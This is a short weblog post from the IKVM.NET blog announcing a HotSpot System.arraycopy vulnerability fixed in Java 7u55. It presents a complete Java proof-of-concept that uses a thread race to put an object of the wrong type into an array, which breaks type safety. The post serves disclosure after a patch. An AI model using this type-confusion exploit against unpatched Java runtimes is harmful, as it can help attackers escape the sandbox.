April, 2014 - IKVM.NET Weblog

Wednesday, April 16, 2014

« IKVM.NET 7.4 Release Candidate 0 | Main | Java Method Overriding Is FUBAR Part 9 o... »

Arraycopy HotSpot Vulnerability Fixed in 7u55

Here is a simple PoC exploit for the issue fixed here:

class Union1 { } class Union2 { } class arraytoctou { static volatile Union1 u1 = new Union1(); public static void main(String[] args) { final Union1[] arr1 = new Union1[1]; final Union2[] arr2 = new Union2[1]; new Thread() { public void run() { for(;;) { try { System.arraycopy(arr1, 0, arr2, 0, 1); if (arr2[0] != null) break; } catch (Exception _) { } } } }.start(); while (arr2[0] == null) { arr1[0] = null; arr1[0] = u1; } System.out.println(arr2[0]); } }

Wednesday, April 16, 2014 10:40:19 AM (W. Europe Daylight Time, UTC+02:00)

Comments [2]

On this page....

Arraycopy HotSpot Vulnerability Fixed in 7u55

Archives

April 2020

Sun

Mon

Tue

Wed

Thu

Fri

Sat

29

30

31

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

1

2

3

4

5

6

7

8

9

Search

Navigation

Official nuget package

IKVM.NET Web Site

IKVM.NET on SourceForge

Categories

April, 2017 (1)

August, 2015 (1)

March, 2015 (1)

January, 2015 (1)

December, 2014 (2)

November, 2014 (1)

October, 2014 (1)

April, 2014 (1)

March, 2014 (2)

February, 2014 (3)

January, 2014 (1)

October, 2013 (2)

April, 2013 (2)

March, 2013 (4)

February, 2013 (5)

January, 2013 (4)

December, 2012 (5)

November, 2012 (1)

October, 2012 (4)

September, 2012 (4)

August, 2012 (1)

April, 2012 (4)

March, 2012 (6)

February, 2012 (2)

January, 2012 (2)

December, 2011 (7)

November, 2011 (10)

October, 2011 (3)

September, 2011 (2)

August, 2011 (6)

April, 2011 (3)

March, 2011 (6)

February, 2011 (4)

January, 2011 (2)

December, 2010 (2)

November, 2010 (4)

October, 2010 (5)

September, 2010 (2)

August, 2010 (7)

April, 2010 (3)

March, 2010 (2)

February, 2010 (1)

January, 2010 (4)

December, 2009 (1)

November, 2009 (4)

October, 2009 (5)

August, 2009 (3)

April, 2009 (4)

March, 2009 (6)

February, 2009 (4)

January, 2009 (1)

December, 2008 (5)

November, 2008 (7)

September, 2008 (7)

August, 2008 (4)

April, 2008 (3)

March, 2008 (2)

February, 2008 (3)

January, 2008 (5)

December, 2007 (6)

November, 2007 (4)

October, 2007 (5)

September, 2007 (4)

August, 2007 (8)

April, 2007 (8)

March, 2007 (6)

February, 2007 (2)

January, 2007 (3)

December, 2006 (6)

November, 2006 (2)

October, 2006 (3)

September, 2006 (4)

August, 2006 (6)

April, 2006 (1)

March, 2006 (5)

February, 2006 (1)

January, 2006 (3)

December, 2005 (1)

November, 2005 (2)

October, 2005 (1)

September, 2005 (3)

August, 2005 (2)

April, 2005 (1)

March, 2005 (4)

February, 2005 (5)

January, 2005 (8)

December, 2004 (3)

November, 2004 (5)

October, 2004 (4)

September, 2004 (4)

August, 2004 (6)

June, 2004 (10)

April, 2004 (1)

March, 2004 (11)

February, 2004 (3)

January, 2004 (1)

December, 2003 (7)

November, 2003 (6)

October, 2003 (8)

September, 2003 (1)

August, 2003 (4)

April, 2003 (6)

March, 2003 (5)

February, 2003 (4)

January, 2003 (4)

December, 2002 (12)

November, 2002 (10)

October, 2002 (5)

September, 2002 (6)

August, 2002 (17)

July, 2002 (13)

June, 2002 (17)

Blogroll

About

Powered by: newtelligence dasBlog 2.3.12105.0

© Copyright 2020, Jeroen Frijters

E-mail

Pick a theme:

Sign In